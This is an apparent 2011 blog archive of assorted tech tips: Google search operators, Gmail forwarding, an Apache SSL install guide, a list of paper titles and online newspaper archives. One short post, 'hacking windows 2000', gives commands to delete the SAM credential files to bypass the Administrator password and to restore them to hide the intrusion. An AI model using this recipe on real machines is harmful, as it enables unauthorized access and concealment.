Thursday, March 3, 2011

google tips n tricks...


A few things you might want to try with Google:

Hand type the following prefixes and note their utility:

link:url Shows other pages with links to that url.

related:url same as "what's related" on serps.

site:domain restricts search results to the given domain.

allinurl: shows only pages with all terms in the url.

inurl: like allinurl, but only for the next query word.

allintitle: shows only results with terms in title.

intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.

cache:url will show the Google version of the passed url.

info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.

spell: will spell check your query and search for it.

stocks: will lookup the search query in a stock index.

filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.

daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.

maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.

phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)

site:www.somesite.net "+www.somesite.+net"
(tells you how many pages of your site are indexed by google)

allintext: searches only within text of pages, but not in the links or page title

allinlinks: searches only within links, not text or title


I hope there is something new in here for you and maybe this infos will be helpfull for ya.

hacking windows 2000


Get in windows 2000 as Administrator.
>
> NOTE: Requires a boot disk.
>
> Get the command prompt and go to C:\winnt\sytem32\config\ and do
the following commands:
> attrib -a -r -h
> copy sam.* a:\
> del Sam.*
>
> reboot the computer. there should be no administrator password.
just put in administrator and hit enter. replace the sam files to
restore the password to hide intrusion.

Wednesday, March 2, 2011

Forwarding All Emails Automatically IN GMAIL..


 Forwarding All Emails Automatically

If you wanted to forward all emails to another account you can do the following.
  • Click on Settings link
  • Click on Forwarding and POP/IMAP tab
  • Click on the radio button “Forward a copy of incoming mail to”, and then give an email id in the text box.
Fig: Setup email automatic forwarding
Fig: Setup email automatic forwarding
You also have the option of deciding what to do with the emails in the original account after forwarding it. Following are the three options available.
  • Keep Gmail’s copy in the inbox
  • Archive Gmail’s copy
  • Delete Gmail’s copy
Now all the mails will be forwarded to the specified email id.

How To Install Apache 2 with SSL on Linux (with mod_ssl, openssl)


This article gives step by step instructions on how to install Apache 2 with mod_ssl.
I prefer to install Apache from source, as it gives me more flexibility on exactly what modules I want to enable or disable, and I can also upgrade or apply patch immediately after it is released by the Apache foundation.

1. Download Apache

Download Apache from httpd.apache.org. The current stable release is 2.2.17.
Once you get the direct URL to download the latest stable version of Apache, use wget as shown below to download it directly to you server.
cd ~
wget http://www.eng.lsu.edu/mirrors/apache//httpd/httpd-2.2.17.tar.gz
tar xvfz httpd-2.2.17.tar.gz

2. Install Apache with SSL/TLS

View all available Apache installation and configuration options as shown below.
cd httpd-2.2.17
./configure --help
To install an Apache module, you would typically say –enable-{module-name}. For example, to install SSL with Apache, it is –enable-ssl. To install ldap module, it is –enable-ldap.
To uninstall any default module that comes with Apache, you would typically say –disable-{module-name}. For example, to disable basic authentication in Apache, it is –disable-auth-basic
In this example, we will install Apache with all default modules, with addition of –enable-ssl (to install mod_ssl for SSL support), and –enable-so, which helps to load modules in Apache during run-time via the Dynamic Shared Object (DSO) mechanism, rather than requiring a recompilation.
./configure --enable-ssl --enable-so
make
make install
Note: By default the above installs Apache under /usr/local/apache2. If you like to change this location, use –prefix option in the ./configure.

3. Enable SSL in httpd.conf

Apache configuration file httpd.conf is located under /usr/local/apache2/conf.
Uncomment the httpd-ssl.conf Include line in the /usr/local/apache2/conf/httpd.conf file.
# vi /usr/local/apache2/conf/httpd.conf
Include conf/extra/httpd-ssl.conf
View the httpd-ssl.conf to review all the default SSL configurations. For most cases, you don’t need to modify anything in this file.
vi /usr/local/apache2/conf/extra/httpd-ssl.conf
The SSL certificate and key are required before we start the Apache. The server.crt and server.key file mentioned in the httpd-ssl.conf needs to be created before we move forward.
# egrep 'server.crt|server.key' httpd-ssl.conf
SSLCertificateFile "/usr/local/apache2/conf/server.crt"
SSLCertificateKeyFile "/usr/local/apache2/conf/server.key"

4. Create server.crt and server.key file

First, Generate the server.key using openssl.
cd ~
openssl genrsa -des3 -out server.key 1024
The above command will ask for the password. Make sure to remember this password. You need this while starting your Apache later.
If you don’t provide a password, you’ll get the following error message.
2415:error:28069065:lib(40):UI_set_result:result too small:ui_lib.c:849:You must type in 4 to 8191 characters
Next, generate a certificate request file (server.csr) using the above server.key file.
openssl req -new -key server.key -out server.csr
Finally, generate a self signed ssl certificate (server.crt) using the above server.key and server.csr file.
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt

5. Copy the server.key and server.crt

Copy the server.key and server.crt file to appropriate Apache configuration directory location.
cd ~
cp server.key /usr/local/apache2/conf/
cp server.crt /usr/local/apache2/conf/

6. Start the apache and verify SSL

Start the Apache as shown below.
/usr/local/apache2/bin/apachectl start
This will prompt you to enter the password for your private key.
Apache/2.2.17 mod_ssl/2.2.17 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide the pass phrases.

Server www.example.com:443 (RSA)
Enter pass phrase:

OK: Pass Phrase Dialog successful.
By default Apache SSL runs on 443 port. Open a web browser and verify that you can access your Apache using https://{your-ip-address}

PAPERS ABSTRACT


Information
Paper Presentation-3-D ICs
Get Abstract
AI AUTOMATES SUBSTATION CONTROL
Get Abstract
FACILITY LAYOUT DESIGN USING GENITIC ALGORITHM
Get Abstract
Wireless Communication with Wi-Fi
Get Abstract
Paper Presentation-A DSP based On-Line UPS
Get Abstract
Paper Presentation-Novel active power filter
Get Abstract
A Solution to Remote Detection of Illegal Electricity Usage via Power Line Communications
Get Abstract
A Fast Simulation Approach for Inductive Effects of VLSI Interconnects
Get Abstract
ADAPTIVE NEURO-FUZZY INFERENCE BASED HVDC CONTROL
Get Abstract
ADVANCED COMMUNICATION THROUGH FLESH REDTACTON
Get Abstract
Paper Presentation-VLSI Architecture
Get Abstract
Application of Artificial Neural Network (ANN) technique for the measurement of voltage stability using FACTS Controllers
Get Abstract
Paper Presentation-Faster chips technique
Get Abstract
Paper Presentation-Speaker recognition
Get Abstract
BRAIN CONTROLLED CAR FOR DISABLED USING ARTIFICIAL INTELLIGENCE
Get Abstract
Paper Presentation-The Brain Fingerprinting Technology
Get Abstract
Paper Presentation-CARBON NANOTUBES
Get Abstract
Paper Presentation-CALL CENTER
Get Abstract
Pen Mode or Trap and Trace Mode
Get Abstract
Paper Presentation-Component Object Model
Get Abstract
Improving Customer Relations Management in Utilities Through the Use of the Internet
Get Abstract
Paper Presentation-INTERNET CRYPTOGRAPHY
Get Abstract
Paper Presentation-speed control of D.C motor using a fuzzy logic
Get Abstract
Paper Presentation-video coding
Get Abstract

A Better Way to Bookmark Web Videos


As you may have previously noticed, the embedded version of YouTube Player now offers a handy ‘Watch Later’ feature that lets you add the current video to a queue with a click. You can then conveniently watch all these ‘queued’ videos later when you have the time.
There’s one minor problem though.
YouTube is ‘the’ most popular video sharing website but it’s not the only one around. You have sites like Vimeo, TED, Break.com, Facebook, Revver, etc. that host awesome video content and wouldn’t it be nice if we could extend the same ‘watch later’ functionality of YouTube to these sites as well?
Enter RadBox – a useful web app that lets you bookmark web videos from all the popular sites to a common queue. You can then watch these videos later from one central location.
web video queue
You can bookmark videos in two ways. First, there’s the Instapaper-style bookmarklet that will save an embedded video to the Radbox queue without you have to leave the page. Or you can simply email the video URL to an email address, an option that will help you bookmark videos even from mobile phones.
Radbox currently supports all the popular video websites include YouTube, Vimeo, College Humour, Google Videos and more. Once you are done watching a video, you can either delete it from the Radbox queue or move it to the archive.

Monday, February 28, 2011

How to Find Old Newspaper Articles Online


Schedule archives of web properties blogs, social media and more.
old newspapers
Old newspapers and magazines offer a wealth of insight into history and critical events as they were unfolding at that time. In the past, the only way to get hold of this treasure trove of information was your local library where the back issues of certain newspapers and magazines may have been preserved.
Fortunately, the Internet and digitization of content has made everything just a click away and now you can access previous issues of old newspapers almost as easily as today’s newspaper that’s lying on your coffee table.
Here are some of the best places on the web where you can find and read old newspapers and magazines online.

Read Old Newspapers and Magazines Online

1. Google News - Google News indexes thousands of newspaper websites from around the world and organizes news in clusters for easy reading. In addition to current news, Google News also offers access to stories published in old newspapers that you can search for free.
Although many of these newspaper issues are scanned images of the original printed version, you can use Google search to find stories inside the papers through the magic ofOCR.  The actual content is hosted on other sites and Google will show if it cost any money to read that issue /news story.
2. Google Books - If you’re looking for an older issue of a magazine, Google Books might be the best place to find it.
These magazines are scanned and searchable and can be read online using the standard Google Book interface.  Decades worth of material are available, and the magazines are laid out just as they were when they were originally printed.  You can read archived magazines cover to cover, including the original articles, index, cover, and advertisements.
3. Trove - The National Library of Australia has a large selection of newspapers from across Australia archived online that anyone may read for free.  All the newspapers are completely scanned and can be viewed online in any modern browser, or you may download them as a PDF for offline reading.
4. Library of Congress - The Library of Congress has a large repository of historic newspapers published in America between 1880 and 1922, available as PDFs.
Though the library has made available newspapers from 14 states and Washington, DC., these states contain some of the largest newspapers and thus the archives are still a very valuable resource.  Additionally, the site has a database of records of all newspapers printed in America from 1690 to the present, including newspapers that are currently not published.
5. Newseum – Here you can find and download front pages of 800+ newspapers from around the world and the newspaper gallery is updated every day. The collection includes small-town and local newspapers as well as globally-distributed big papers.  They also maintain an archive of newspaper front pages belonging to dates of significant importance (for example, see the September 11 archive).
6. The Olden Times - If you’re looking for a popular article about a major historical event, the Olden Times may be a good place to look for it.  Although they do not contain entire newspapers, they do have snippets including popular news articles, print advertisements, and personal information sections such as births and obituaries.  All content is free, and the content ranges from between 1788 and 1920.
7. OMA – Like The Olden Times but for past magazine issues. Old Magazine Articles contains magazine pages covering from famous historical events. The articles can be downloaded as PDF files for free though they have been mildly edited to remove advertisements from the original magazines.
8. Wayback Machine – Simply enter a news website address into the search box (nytimes.com for example), and the Wayback machine will show you a list of snapshots of that site. You can then read the news as it appeared on that day. It also includes collections of news articles from major events like the Asian Tsunami of 2004.
9. NewspaperARCHIVE – This is the world’s largest online archive of historical newspapers published from 1753 onwards.  You can browse newspaper issues by date or find articles that match a particular phrase. NewspaperARCHIVE costs $9.99 a month if you subscribe for an year.
10. Ancestry.com - Although Ancestry.com is designed for building family trees or for finding information about your ancestors, its archives also includes thousands of newspapers and periodicals dating back to the 1700's. Subscriptions start at $19.95/month or $12.95/month if paid per year.

Archives of Popular Newspapers and News agencies

1. Times Machine – This has archived editions of The New York Times from 1851 through 1922. The issues are identical to the original newspapers, and include all pages including the advertisements.
2. Times Archive - The Times. the daily paper from the UK, offers digital archives of issues from 1785 to 1985 on their website.  All pages of the papers are completely scanned, and are additionally organized with an index of topics.  You can read the articles highlighted on their front page for free while specific papers and articles are available for £4.95/day.
3. Boston Globe – All issues of The Boston Globe newspaper printed since 1924 are available online. You can access all news articles printed since 1979 for free while the older articles are available at $2.95 for a single article.
4. BBC – The On This Day section of BBC offers an online archive of some of the most significant stories broadcast by BBC News since 1950.   You can select any date from the menu at the top of the page, and view the news from that date as well as today’s historical news.
5. Press Display – This is like online newspaper kiosk where you can find current and past issues of hundreds of newspapers and magazines in full-color, full-page format. Individual issues cost 99¢ each and you may also download them on your Windows PC, Mac or mobile devices for offline reading.